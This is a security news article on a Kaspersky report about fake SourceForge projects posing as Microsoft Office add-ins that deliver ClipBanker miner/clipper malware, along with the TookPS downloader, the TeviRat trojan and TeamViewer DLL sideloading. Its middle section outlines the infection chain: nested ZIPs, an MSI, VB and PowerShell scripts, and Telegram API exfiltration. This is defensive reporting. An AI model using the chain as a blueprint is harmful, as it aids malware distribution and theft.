Malicious actors have taken advantage of SourceForge, a reputable software hosting platform, to propagate cryptocurrency miner and clipper malware, masquerading as cracked versions of popular applications. This deceptive tactic lures users into downloading harmful software under the guise of legitimate programs such as Microsoft Office, exposing them to significant cybersecurity threats.
Malicious Projects Masquerading as Legitimate Software
Kaspersky, a well-regarded cybersecurity firm, recently revealed that hackers are leveraging SourceForge to disseminate malware by creating fraudulent projects that impersonate legitimate software. One glaring example of this is a project titled “officepackage.” This project ostensibly offers various Microsoft Office add-ins, purportedly sourced from a legitimate GitHub repository. It appears authentic both in its description and content, as it mimics genuine details to deceive users. The strategy behind these fake projects is simple yet effective: attackers replicate the appearance of legitimate applications to create a false sense of security. Users believe they are downloading useful add-ins for their Microsoft Office suite, but in reality, they are stepping into a malware trap. The project “officepackage,” for instance, utilizes components and descriptions directly taken from GitHub, enhancing its illusion of legitimacy. This fraudulent setup on SourceForge, including the domain “officepackage.sourceforge[.]io,” lists numerous Microsoft Office applications and download links primarily in the Russian language, appealing specifically to Russian-speaking users.
Deceptive Download Links and Redirects
The deceptive practices by attackers don’t stop at just mimicking legitimate software projects. When users attempt to download applications from projects like “officepackage,” they encounter a website interface designed to appear convincing. Hovering over the download buttons reveals innocuous-looking URLs such as “loading.sourceforge[.]io/download.” This superficial authenticity builds a false sense of trust among users, making them believe the link will direct them to the intended software.
However, clicking the download button reroutes users to an unrelated webpage hosted on “taplink[.]cc.” Here, users face another download button, leading to the download of a 7 MB ZIP archive named “vinstaller.zip.” Upon opening this archive, users find another password-protected ZIP file (“installer.zip”) and a text file containing the necessary password. Within the protected ZIP file lies an MSI installer crafted to deploy malicious components. This installer includes a console archive utility known as “UnRAR.exe,” a RAR archive, and a VB script.
The VB script runs a PowerShell interpreter, which executes a batch file named “confvk” fetched from GitHub. This file harbors the password for the RAR archive and facilitates the execution of more malicious scripts. The batch file initiates two critical PowerShell scripts: one that transmits system metadata through the Telegram API, and another that downloads an additional script to act on the RAR archive contents. This intricate process ultimately leads to the deployment of malware payloads, specifically ClipBanker—a cryptocurrency miner and clipper malware.
Broader Implications and Additional Campaigns
The deployment of cryptocurrency malware via SourceForge is not an isolated incident. Kaspersky’s report highlights broader implications, suggesting that the malware scheme may enable attackers to gain system access, potentially selling it to more dangerous entities. This aspect underscores the significant threat posed to users who download software from unofficial sources.
Further complicating the picture, another campaign involves distributing a malware downloader known as TookPS. This downloader spreads via fraudulent sites imitating legitimate software platforms. For instance, sites like “deepseek-ai-soft[.]com” mimic the DeepSeek AI chatbot and various remote desktop and 3D modeling tools. These fake websites appear authentic and often rank high in sponsored Google search results, ensnaring unsuspecting users. TookPS’s primary function is to download and run PowerShell scripts that allow remote access to infected systems via SSH. The downloader also deploys a modified trojan called TeviRat, which gives attackers unrestrained access to victims’ computers.
Additionally, Kaspersky’s findings indicate the use of DLL sideloading techniques to alter TeamViewer remote access software on infected machines. By placing a malicious library alongside TeamViewer, hackers can modify its behavior stealthily, enabling covert remote access without the user’s awareness.
Evolving Threat Landscape
Malicious actors have exploited SourceForge, a respected software-hosting platform, to spread cryptocurrency miner and clipper malware. They disguise these harmful programs as cracked versions of popular applications, deceiving users into downloading what they think are legitimate software packages such as Microsoft Office. This treacherous tactic not only undermines the trust in well-known applications but also puts users at serious risk of cybersecurity threats. Instead of getting the desired software, users end up with malware that can drain their computer’s resources by mining cryptocurrencies or intercept and alter clipboard contents to steal sensitive information, such as cryptocurrency wallet addresses or other personal data. This kind of malicious attack highlights the importance of downloading software only from trusted sources and being wary of cracked versions, which often come with hidden dangers. SourceForge’s reputation as a reliable platform is being manipulated by these bad actors, stressing a need for greater vigilance and stronger security measures to protect users from such deceptive practices.